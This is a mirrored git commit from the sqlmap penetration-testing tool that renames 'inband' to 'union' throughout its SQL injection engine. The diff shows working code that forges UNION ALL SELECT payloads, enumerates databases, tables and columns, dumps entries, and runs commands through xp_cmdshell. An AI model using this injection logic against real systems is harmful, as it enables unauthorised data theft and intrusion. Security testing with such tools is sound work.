mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
Massive renaming (proper naming is inband = union & error techniques! - query naming stays as they are/in code things like forgeInbandQuery are renamed to forgeUnionQuery)
This commit is contained in:
Miroslav Stampar
parent
a435ba6863
commit
c1b8226329
|
|
@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
# Test for UNION injection and set the sample
|
||||
# payload as well as the vector.
|
||||
# NOTE: vector is set to a tuple with 6 elements,
|
||||
# used afterwards by Agent.forgeInbandQuery()
|
||||
# used afterwards by Agent.forgeUnionQuery()
|
||||
# method to forge the UNION query payload
|
||||
|
||||
configUnion(test.request.char, test.request.columns)
|
||||
|
|
|
|||
|
|
@ -133,7 +133,7 @@ def __formatInjection(inj):
|
|||
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
|
||||
title = re.sub(r"\d+ to \d+", str(count), title)
|
||||
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
|
||||
vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
|
||||
if count == 1:
|
||||
title = title.replace("columns", "column")
|
||||
elif comment:
|
||||
|
|
|
|||
|
|
@ -561,7 +561,7 @@ class Agent:
|
|||
|
||||
return concatenatedQuery
|
||||
|
||||
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
|
||||
def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
|
||||
"""
|
||||
Take in input an query (pseudo query) string and return its
|
||||
processed UNION ALL SELECT query.
|
||||
|
|
@ -602,20 +602,20 @@ class Agent:
|
|||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
|
||||
limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1))
|
||||
|
||||
inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
|
||||
unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
|
||||
|
||||
if limited:
|
||||
inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
|
||||
inbandQuery += fromTable
|
||||
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
|
||||
unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
|
||||
unionQuery += fromTable
|
||||
unionQuery = self.suffixQuery(unionQuery, comment, suffix)
|
||||
|
||||
return inbandQuery
|
||||
return unionQuery
|
||||
|
||||
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
|
||||
if topNumRegex:
|
||||
topNum = topNumRegex.group(1)
|
||||
query = query[len("TOP %s " % topNum):]
|
||||
inbandQuery += "TOP %s " % topNum
|
||||
unionQuery += "TOP %s " % topNum
|
||||
|
||||
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
|
||||
|
||||
|
|
@ -623,51 +623,51 @@ class Agent:
|
|||
intoRegExp = intoRegExp.group(1)
|
||||
query = query[:query.index(intoRegExp)]
|
||||
|
||||
if fromTable and inbandQuery.endswith(fromTable):
|
||||
inbandQuery = inbandQuery[:-len(fromTable)]
|
||||
if fromTable and unionQuery.endswith(fromTable):
|
||||
unionQuery = unionQuery[:-len(fromTable)]
|
||||
|
||||
for element in xrange(0, count):
|
||||
if element > 0:
|
||||
inbandQuery += ','
|
||||
unionQuery += ','
|
||||
|
||||
if element == position:
|
||||
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
|
||||
conditionIndex = query.index(" FROM ")
|
||||
inbandQuery += query[:conditionIndex]
|
||||
unionQuery += query[:conditionIndex]
|
||||
else:
|
||||
inbandQuery += query
|
||||
unionQuery += query
|
||||
else:
|
||||
inbandQuery += char
|
||||
unionQuery += char
|
||||
|
||||
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
|
||||
conditionIndex = query.index(" FROM ")
|
||||
inbandQuery += query[conditionIndex:]
|
||||
unionQuery += query[conditionIndex:]
|
||||
|
||||
if fromTable:
|
||||
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
|
||||
inbandQuery += fromTable
|
||||
if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery:
|
||||
unionQuery += fromTable
|
||||
|
||||
if intoRegExp:
|
||||
inbandQuery += intoRegExp
|
||||
unionQuery += intoRegExp
|
||||
|
||||
if multipleUnions:
|
||||
inbandQuery += " UNION ALL SELECT "
|
||||
unionQuery += " UNION ALL SELECT "
|
||||
|
||||
for element in xrange(count):
|
||||
if element > 0:
|
||||
inbandQuery += ','
|
||||
unionQuery += ','
|
||||
|
||||
if element == position:
|
||||
inbandQuery += multipleUnions
|
||||
unionQuery += multipleUnions
|
||||
else:
|
||||
inbandQuery += char
|
||||
unionQuery += char
|
||||
|
||||
if fromTable:
|
||||
inbandQuery += fromTable
|
||||
unionQuery += fromTable
|
||||
|
||||
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
|
||||
unionQuery = self.suffixQuery(unionQuery, comment, suffix)
|
||||
|
||||
return inbandQuery
|
||||
return unionQuery
|
||||
|
||||
def limitQuery(self, num, query, field=None, uniqueField=None):
|
||||
"""
|
||||
|
|
|
|||
|
|
@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False):
|
|||
|
||||
def parseUnionPage(page):
|
||||
"""
|
||||
Returns resulting items from inband query inside provided page content
|
||||
Returns resulting items from union query inside provided page content
|
||||
"""
|
||||
|
||||
if page is None:
|
||||
|
|
|
|||
|
|
@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63
|
|||
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
|
||||
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters)
|
||||
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections)
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||
|
||||
# Maximum response total page size (trimmed if larger)
|
||||
|
|
|
|||
|
|
@ -347,9 +347,9 @@ def __goBooleanProxy(expression):
|
|||
|
||||
return output
|
||||
|
||||
def __goInband(expression, unpack=True, dump=False):
|
||||
def __goUnion(expression, unpack=True, dump=False):
|
||||
"""
|
||||
Retrieve the output of a SQL query taking advantage of an inband SQL
|
||||
Retrieve the output of a SQL query taking advantage of an union SQL
|
||||
injection vulnerability on the affected parameter.
|
||||
"""
|
||||
|
||||
|
|
@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False):
|
|||
|
||||
return output
|
||||
|
||||
def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
||||
def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
||||
"""
|
||||
Called each time sqlmap inject a SQL query on the SQL injection
|
||||
affected parameter. It can call a function to retrieve the output
|
||||
through inband SQL injection (if selected) and/or blind SQL injection
|
||||
(if selected).
|
||||
affected parameter.
|
||||
"""
|
||||
|
||||
kb.safeCharEncode = safeCharEncode
|
||||
|
|
@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
|
|||
query = query.replace("DISTINCT ", "")
|
||||
|
||||
if not conf.forceDns:
|
||||
if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||
value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
count += 1
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
|
|
|
|||
|
|
@ -213,12 +213,12 @@ class xp_cmdshell:
|
|||
output = inject.getValue(query, resumeValue=False, blind=False, time=False)
|
||||
else:
|
||||
output = []
|
||||
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if isNumPosStrValue(count):
|
||||
for index in getLimitRange(count):
|
||||
query = agent.limitQuery(index, query, self.tblField)
|
||||
output.append(inject.getValue(query, inband=False, error=False, resumeValue=False))
|
||||
output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
|
||||
|
||||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||
|
||||
|
|
|
|||
|
|
@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
|
|||
pages = {}
|
||||
|
||||
for count in xrange(lowerCount, upperCount+1):
|
||||
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
if not isNullValue(kb.uChar):
|
||||
|
|
@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
|
||||
# For each column of the table (# of NULL) perform a request using
|
||||
# the UNION ALL SELECT statement to test it the target url is
|
||||
# affected by an exploitable inband SQL injection vulnerability
|
||||
# affected by an exploitable union SQL injection vulnerability
|
||||
for position in positions:
|
||||
# Prepare expression with delimiters
|
||||
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
|
||||
|
|
@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
||||
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
|
||||
|
||||
# Forge the inband SQL injection request
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
|
||||
# Forge the union SQL injection request
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
|
@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
|
||||
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
|
||||
|
||||
# Confirm that it is a full inband SQL injection
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
|
||||
# Confirm that it is a full union SQL injection
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
|
@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
|
||||
|
||||
# Check for limited row output
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
|
@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
|
|||
validPayload = None
|
||||
vector = None
|
||||
|
||||
# Confirm the inband SQL injection and get the exact column
|
||||
# Confirm the union SQL injection and get the exact column
|
||||
# position which can be used to extract data
|
||||
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count)
|
||||
|
||||
# Assure that the above function found the exploitable full inband
|
||||
# Assure that the above function found the exploitable full union
|
||||
# SQL injection position
|
||||
if not validPayload:
|
||||
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
|
||||
|
|
@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
|
|||
|
||||
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
|
||||
"""
|
||||
This method tests if the target url is affected by an inband
|
||||
This method tests if the target url is affected by an union
|
||||
SQL injection vulnerability. The test is done up to 50 columns
|
||||
on the target database table
|
||||
"""
|
||||
|
|
@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
|
|||
|
||||
def unionTest(comment, place, parameter, value, prefix, suffix):
|
||||
"""
|
||||
This method tests if the target url is affected by an inband
|
||||
This method tests if the target url is affected by an union
|
||||
SQL injection vulnerability. The test is done up to 3*50 times
|
||||
"""
|
||||
|
||||
|
|
|
|||
|
|
@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper
|
|||
from lib.request.connect import Connect as Request
|
||||
|
||||
def __oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted
|
||||
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.resumed = retVal is not None
|
||||
|
|
@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
|
|||
|
||||
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None
|
||||
|
||||
# Forge the inband SQL injection request
|
||||
# Forge the union SQL injection request
|
||||
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
|
||||
kb.unionDuplicates = vector[7]
|
||||
query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
|
@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
|
|||
if retVal is not None:
|
||||
retVal = getUnicode(retVal, kb.pageEncoding)
|
||||
|
||||
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection
|
||||
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection
|
||||
if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError():
|
||||
retVal = htmlunescape(retVal).replace("<br>", "\n")
|
||||
|
||||
|
|
@ -140,9 +140,9 @@ def configUnion(char=None, columns=None):
|
|||
|
||||
def unionUse(expression, unpack=True, dump=False):
|
||||
"""
|
||||
This function tests for an inband SQL injection on the target
|
||||
This function tests for an union SQL injection on the target
|
||||
url then call its subsidiary function to effectively perform an
|
||||
inband SQL injection on the affected url
|
||||
union SQL injection on the affected url
|
||||
"""
|
||||
|
||||
initTechnique(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
|
@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False):
|
|||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY
|
||||
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY
|
||||
value = __oneShotUnionUse(expression, unpack)
|
||||
|
||||
duration = calculateDeltaSeconds(start)
|
||||
|
|
|
|||
|
|
@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
|
||||
if count is None:
|
||||
query = dumpNode.count % table
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
|
||||
|
||||
if isinstance(count, basestring) and count.isdigit():
|
||||
count = int(count)
|
||||
|
|
@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
logger.info(infoMsg)
|
||||
|
||||
query = dumpNode.count2 % (column, table)
|
||||
value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if isNumPosStrValue(value):
|
||||
validColumnList = True
|
||||
|
|
@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
else:
|
||||
query = dumpNode.query2 % (column, table, colList[0], pivotValue)
|
||||
|
||||
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind))
|
||||
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))
|
||||
|
||||
if column == colList[0]:
|
||||
if isNoneValue(value):
|
||||
|
|
|
|||
|
|
@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
|
|||
|
||||
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
|
||||
_ = query.replace("%s", db)
|
||||
count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
if not isNoneValue(count):
|
||||
break
|
||||
|
||||
|
|
@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration):
|
|||
for index in xrange(int(count)):
|
||||
_ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
|
||||
|
||||
table = inject.getValue(_, inband=False, error=False)
|
||||
table = inject.getValue(_, union=False, error=False)
|
||||
if not isNoneValue(table):
|
||||
kb.hintValue = table
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
|
@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.count
|
||||
query = query.replace("%s", db)
|
||||
query += " AND %s" % tblQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no table"
|
||||
|
|
@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = query.replace("%s", db)
|
||||
query += " AND %s" % tblQuery
|
||||
query = agent.limitQuery(index, query, tblCond)
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
foundTbls[db].append(tbl)
|
||||
|
||||
|
|
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = query % (db, db, db, db, db, db)
|
||||
query += " AND %s" % colQuery.replace("[DB]", db)
|
||||
query += whereTblsQuery.replace("[DB]", db)
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no tables contain column"
|
||||
|
|
@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration):
|
|||
query += " AND %s" % colQuery.replace("[DB]", db)
|
||||
query += whereTblsQuery.replace("[DB]", db)
|
||||
query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
|
||||
tbl = safeSQLIdentificatorNaming(tbl, True)
|
||||
|
|
|
|||
|
|
@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.count2 % queryUser
|
||||
else:
|
||||
query = rootQuery.blind.count % queryUser
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
if count != 0 and not query2:
|
||||
|
|
@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.query2 % (queryUser, index)
|
||||
else:
|
||||
query = rootQuery.blind.query % (queryUser, index)
|
||||
role = inject.getValue(query, inband=False, error=False)
|
||||
role = inject.getValue(query, union=False, error=False)
|
||||
|
||||
# In Oracle we get the list of roles as string
|
||||
roles.add(role)
|
||||
|
|
|
|||
|
|
@ -116,7 +116,7 @@ class Databases:
|
|||
query = rootQuery.blind.count2
|
||||
else:
|
||||
query = rootQuery.blind.count
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of databases"
|
||||
|
|
@ -132,7 +132,7 @@ class Databases:
|
|||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
query = rootQuery.blind.query % index
|
||||
db = inject.getValue(query, inband=False, error=False)
|
||||
db = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if db:
|
||||
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
|
||||
|
|
@ -300,7 +300,7 @@ class Databases:
|
|||
else:
|
||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if count == 0:
|
||||
warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db)
|
||||
|
|
@ -329,7 +329,7 @@ class Databases:
|
|||
else:
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
|
||||
|
||||
table = inject.getValue(query, inband=False, error=False)
|
||||
table = inject.getValue(query, union=False, error=False)
|
||||
if not isNoneValue(table):
|
||||
kb.hintValue = table
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
|
@ -593,11 +593,11 @@ class Databases:
|
|||
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = rootQuery.blind.query % tbl
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
value = inject.getValue(query, union=False, error=False)
|
||||
parseSqliteTableSchema(value)
|
||||
return kb.data.cachedColumns
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of columns "
|
||||
|
|
@ -629,7 +629,7 @@ class Databases:
|
|||
field = None
|
||||
|
||||
query = agent.limitQuery(index, query, field, field)
|
||||
column = inject.getValue(query, inband=False, error=False)
|
||||
column = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if not isNoneValue(column):
|
||||
if not onlyColNames:
|
||||
|
|
@ -643,7 +643,7 @@ class Databases:
|
|||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query2 % (tbl, column)
|
||||
|
||||
colType = inject.getValue(query, inband=False, error=False)
|
||||
colType = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if Backend.isDbms(DBMS.FIREBIRD):
|
||||
colType = FIREBIRD_TYPES.get(colType, colType)
|
||||
|
|
|
|||
|
|
@ -210,7 +210,7 @@ class Entries:
|
|||
else:
|
||||
query = rootQuery.blind.count % (conf.db, tbl)
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
lengths = {}
|
||||
entries = {}
|
||||
|
|
@ -255,7 +255,7 @@ class Entries:
|
|||
|
||||
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
|
||||
for column in colList:
|
||||
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0':
|
||||
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0':
|
||||
emptyColumns.append(column)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
|
|
@ -284,7 +284,7 @@ class Entries:
|
|||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query % (index, column, tbl)
|
||||
|
||||
value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True)
|
||||
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
|
||||
value = '' if value is None else value
|
||||
|
||||
_ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))
|
||||
|
|
|
|||
|
|
@ -103,7 +103,7 @@ class Search:
|
|||
|
||||
query += dbQuery
|
||||
query += exclDbsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no database"
|
||||
|
|
@ -127,7 +127,7 @@ class Search:
|
|||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query, dbCond)
|
||||
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
value = inject.getValue(query, union=False, error=False)
|
||||
value = safeSQLIdentificatorNaming(value)
|
||||
foundDbs.append(value)
|
||||
|
||||
|
|
@ -213,7 +213,7 @@ class Search:
|
|||
query = rootQuery.blind.count
|
||||
query += tblQuery
|
||||
query += whereDbsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no databases have table"
|
||||
|
|
@ -234,7 +234,7 @@ class Search:
|
|||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query)
|
||||
|
||||
foundDb = inject.getValue(query, inband=False, error=False)
|
||||
foundDb = inject.getValue(query, union=False, error=False)
|
||||
foundDb = safeSQLIdentificatorNaming(foundDb)
|
||||
|
||||
if foundDb not in foundTbls:
|
||||
|
|
@ -258,7 +258,7 @@ class Search:
|
|||
query = rootQuery.blind.count2
|
||||
query = query % unsafeSQLIdentificatorNaming(db)
|
||||
query += " AND %s" % tblQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no table"
|
||||
|
|
@ -278,7 +278,7 @@ class Search:
|
|||
query += " AND %s" % tblQuery
|
||||
query = agent.limitQuery(index, query)
|
||||
|
||||
foundTbl = inject.getValue(query, inband=False, error=False)
|
||||
foundTbl = inject.getValue(query, union=False, error=False)
|
||||
